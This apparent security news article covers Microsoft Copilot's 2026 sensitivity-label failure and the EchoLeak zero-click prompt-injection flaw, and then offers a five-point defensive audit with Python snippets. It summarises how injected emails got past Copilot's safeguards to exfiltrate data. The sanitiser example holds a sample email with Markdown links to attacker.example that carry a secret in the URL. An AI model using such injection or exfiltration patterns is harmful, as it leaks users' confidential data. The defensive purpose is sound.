Microsoft Copilot ignored sensitivity labels twice in eight months — and no DLP stack caught either one

Microsoft Copilot’s Catastrophic Data Leak: A Wake-Up Call for Enterprise AI Security

In a stunning revelation that has sent shockwaves through the cybersecurity community, Microsoft’s AI-powered Copilot assistant was caught red-handed accessing and summarizing confidential emails for four weeks, despite explicit security protocols designed to prevent exactly this scenario. The breach, which affected the UK’s National Health Service and potentially countless other organizations, exposes a critical vulnerability in how enterprises deploy AI tools that access sensitive corporate data.

The Timeline of Failure

Starting January 21, 2026, Microsoft Copilot began reading and summarizing confidential emails it was explicitly restricted from accessing. The breakdown persisted for four weeks before Microsoft acknowledged the issue. During this window, Copilot processed labeled messages in Sent Items and Drafts folders, ignoring the sensitivity labels and Data Loss Prevention (DLP) policies that should have blocked access.

The incident was tracked internally as CW1226324 and logged by the NHS as INC46740412, underscoring the severity of the breach in regulated healthcare environments. Microsoft first disclosed the issue on February 18, 2026, following initial reporting by BleepingComputer.

Not an Isolated Incident

This represents the second major security failure for Copilot in just eight months. In June 2025, Microsoft patched CVE-2025-32711, dubbed “EchoLeak” by Aim Security researchers. This critical zero-click vulnerability allowed malicious emails to bypass Copilot’s multiple security layers—including its prompt injection classifier, link redaction, Content-Security-Policy controls, and reference mention safeguards—to silently exfiltrate enterprise data without any user interaction. The vulnerability earned a CVSS score of 9.3, marking it as critical.

Why Traditional Security Tools Failed

The most alarming aspect of these breaches is that neither incident triggered alerts from traditional security infrastructure. Endpoint Detection and Response (EDR) systems, Web Application Firewalls (WAFs), and Security Information and Event Management (SIEM) platforms all reported “all clear” while Copilot was actively violating its own trust boundaries.

The fundamental problem lies in architectural blind spots. EDR monitors file and process behavior on endpoints, while WAFs inspect HTTP payloads at the network perimeter. Neither was designed to observe AI assistant behavior inside Microsoft’s infrastructure, particularly in the retrieval-augmented generation pipeline where the violations occurred.

Copilot’s actions happened entirely within Microsoft’s servers—between the retrieval index and the generation model. No files were written to disk, no anomalous network traffic crossed the perimeter, and no processes spawned that endpoint agents could flag. The security stack remained silent because it never saw the layer where the violation occurred.

The Root Cause Analysis

CW1226324 stemmed from a code-path error that allowed messages in Sent Items and Drafts to enter Copilot’s retrieval set despite sensitivity labels and DLP rules. EchoLeak exploited something deeper: a structural flaw in how AI agents mix trusted and untrusted input within a single context.

Aim Security’s researchers characterized this as a critical architectural vulnerability: “agents process trusted and untrusted data in the same thought process, making them structurally vulnerable to manipulation.” This design flaw persisted even after Microsoft patched EchoLeak, as evidenced by CW1226324’s independent failure.

The Five-Point Audit Every Organization Needs

Security leaders must implement immediate controls to prevent similar breaches. Here’s the comprehensive audit framework that maps to both failure modes:

1. Direct DLP Enforcement Testing
Create labeled test messages in controlled folders and query Copilot to verify it cannot surface them. Run this test monthly—configuration is not enforcement. The only proof is a failed retrieval attempt.
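The monthly check above can be sketched as a simple assertion over retrieval results. This is an illustrative harness, not a Microsoft API: the planted message IDs and the citation set are placeholders for whatever identifiers your test messages and Copilot’s cited sources actually expose in your tenant.

```python
# Sketch of a monthly DLP-enforcement check (hypothetical identifiers).
# Plant labeled test messages in controlled folders, query Copilot, then
# verify that none of the planted message IDs appear among the sources
# Copilot cites in its answer.

PLANTED_LABELED_IDS = {"test-msg-001", "test-msg-002", "test-msg-003"}

def verify_dlp_enforcement(cited_source_ids: set[str]) -> list[str]:
    """Return any planted labeled messages that Copilot wrongly surfaced.

    An empty result is the only acceptable outcome: configuration is not
    enforcement, and a failed retrieval attempt is the proof.
    """
    return sorted(PLANTED_LABELED_IDS & cited_source_ids)

# Simulated citation sets (in practice these come from the assistant's
# citation metadata for each test query).
clean_run = verify_dlp_enforcement({"public-doc-9", "wiki-page-4"})
leaky_run = verify_dlp_enforcement({"public-doc-9", "test-msg-002"})

assert clean_run == []                # enforcement held
assert leaky_run == ["test-msg-002"]  # escalate: labeled content surfaced
```

A non-empty result from any run should open an incident, not a ticket.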

2. External Content Blocking
Disable external email context in Copilot settings and restrict Markdown rendering in AI outputs. EchoLeak succeeded because malicious emails entered Copilot’s retrieval set and executed as if they were legitimate user queries. Blocking external content removes this attack surface entirely.
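Part of why Markdown restriction matters: EchoLeak-style exfiltration relied on rendered Markdown smuggling data into attacker-controlled URLs. A minimal illustration of that defense, assuming nothing about Microsoft’s actual implementation, is a sanitizer that strips link and image syntax from untrusted external content before it can reach an assistant’s context:

```python
import re

# Illustrative filter: remove Markdown images and links from untrusted
# (external) email bodies. Rendered images and links are an exfiltration
# channel because secrets can be encoded into their URLs; dropping the
# syntax from external content closes that channel.

MD_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")   # ![alt](url) -> removed
MD_LINK = re.compile(r"\[([^\]]*)\]\([^)]*\)")   # [text](url) -> keep text

def sanitize_external_content(body: str) -> str:
    body = MD_IMAGE.sub("", body)       # drop images entirely
    body = MD_LINK.sub(r"\1", body)     # keep link text, drop the URL
    return body

evil = ("Quarterly numbers: ![x](https://attacker.example/?d=SECRET) "
        "see [report](https://attacker.example/steal)")
print(sanitize_external_content(evil))  # no attacker URLs survive
```

Real deployments would sanitize at ingestion, before indexing, so the retrieval layer never stores the exfiltration vector at all.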

3. Purview Log Auditing
Examine Purview logs for anomalous Copilot interactions during the exposure window: queries that returned content from labeled messages between January 21 and mid-February 2026. If your tenant cannot reconstruct what Copilot accessed during this period, document that gap formally; it is a compliance liability waiting to happen.
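A first pass over an exported audit log can be as simple as the sketch below. It assumes a newline-delimited JSON export with `CreationTime` and `Operation` fields and a `CopilotInteraction` operation name; verify these against your tenant’s actual export schema before relying on it.

```python
import json
from datetime import datetime, timezone

# Sketch: scan an exported unified-audit-log file (one JSON record per
# line) for Copilot interactions inside the exposure window. Field and
# operation names are assumptions based on typical audit exports.

WINDOW_START = datetime(2026, 1, 21, tzinfo=timezone.utc)
WINDOW_END = datetime(2026, 2, 18, tzinfo=timezone.utc)

def in_exposure_window(record: dict) -> bool:
    ts = datetime.fromisoformat(record["CreationTime"]).replace(tzinfo=timezone.utc)
    return (record.get("Operation") == "CopilotInteraction"
            and WINDOW_START <= ts <= WINDOW_END)

def flag_records(lines: list[str]) -> list[dict]:
    return [r for r in map(json.loads, lines) if in_exposure_window(r)]

sample = [
    json.dumps({"CreationTime": "2026-02-01T10:00:00", "Operation": "CopilotInteraction"}),
    json.dumps({"CreationTime": "2025-12-01T10:00:00", "Operation": "CopilotInteraction"}),
    json.dumps({"CreationTime": "2026-02-01T10:00:00", "Operation": "MailItemsAccessed"}),
]
assert len(flag_records(sample)) == 1  # only the in-window Copilot event
```

Flagged records still need manual review to determine whether labeled content was actually returned; the scan only narrows the haystack.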

4. Restricted Content Discovery (RCD) Implementation
Enable RCD for SharePoint sites with sensitive data. This removes sites from Copilot’s retrieval pipeline entirely, working regardless of whether trust violations come from code bugs or injected prompts. For organizations handling regulated data, RCD is not optional—it’s essential containment.

5. Vendor-Hosted Inference IR Playbook
Build incident response playbooks specifically for trust boundary violations inside vendor inference pipelines. Define escalation paths, assign ownership, and establish monitoring cadences for vendor service health advisories affecting AI processing. Your SIEM won’t catch the next one either.

The Broader Implications

This isn’t just a Copilot problem. A 2026 Cybersecurity Insiders survey found that 47% of CISOs and senior security leaders have already observed AI agents exhibiting unintended or unauthorized behavior. Organizations are deploying AI assistants faster than they can build governance around them.

Any RAG-based assistant pulling from enterprise data follows the same pattern: a retrieval layer selects content, an enforcement layer gates what the model can see, and a generation layer produces output. If the enforcement layer fails, the retrieval layer feeds restricted data to the model, and the security stack never sees it.
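The three-layer pattern and its failure mode can be made concrete with a toy pipeline. This is a deliberately minimal sketch, not any vendor’s architecture: the point is that when the enforcement gate silently passes everything through, restricted content reaches the model and nothing downstream ever notices.

```python
# Minimal sketch of the retrieval -> enforcement -> generation pattern.
# The enforcement layer is the single point where sensitivity labels are
# honored; a bug there feeds restricted data straight into generation.

CORPUS = {
    "doc-1": {"text": "public roadmap", "label": None},
    "doc-2": {"text": "confidential salaries", "label": "Confidential"},
}

def retrieve(query: str) -> list[str]:
    # Toy retrieval: return every document id (real systems rank by relevance).
    return list(CORPUS)

def enforce(doc_ids: list[str]) -> list[str]:
    # Correct behavior: gate out labeled content before the model sees it.
    return [d for d in doc_ids if CORPUS[d]["label"] is None]

def broken_enforce(doc_ids: list[str]) -> list[str]:
    # Failure mode (CW1226324-style): the gate passes everything through.
    return doc_ids

def generate(doc_ids: list[str]) -> str:
    return " | ".join(CORPUS[d]["text"] for d in doc_ids)

assert "confidential" not in generate(enforce(retrieve("q")))   # gate holds
assert "confidential" in generate(broken_enforce(retrieve("q")))  # gate fails
```

Note that both runs look identical to endpoint and network monitoring: no file writes, no anomalous traffic, just a different string returned to the user.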

This vulnerability pattern transfers beyond Copilot to any AI tool with retrieval access to internal documents—Gemini for Workspace, custom RAG implementations, and emerging AI assistants all carry the same structural risk.

The Board-Level Conversation

Security leaders must be prepared to explain these failures to executive stakeholders. The narrative isn’t about policy misconfiguration—it’s about enforcement failure inside vendor infrastructure. The board-level answer should be clear: “Our policies were configured correctly. Enforcement failed inside the vendor’s inference pipeline. Here are the five controls we are testing, restricting, and demanding before we re-enable full access for sensitive workloads.”

The next failure won’t send an alert. Organizations must act now to implement these controls before the next breach occurs.


tags: Microsoft Copilot, data breach, AI security, cybersecurity, enterprise AI, DLP failure, NHS breach, EchoLeak, CVE-2025-32711, RAG security, trust boundary violation, Purview logs, Restricted Content Discovery, vendor-hosted inference, AI governance
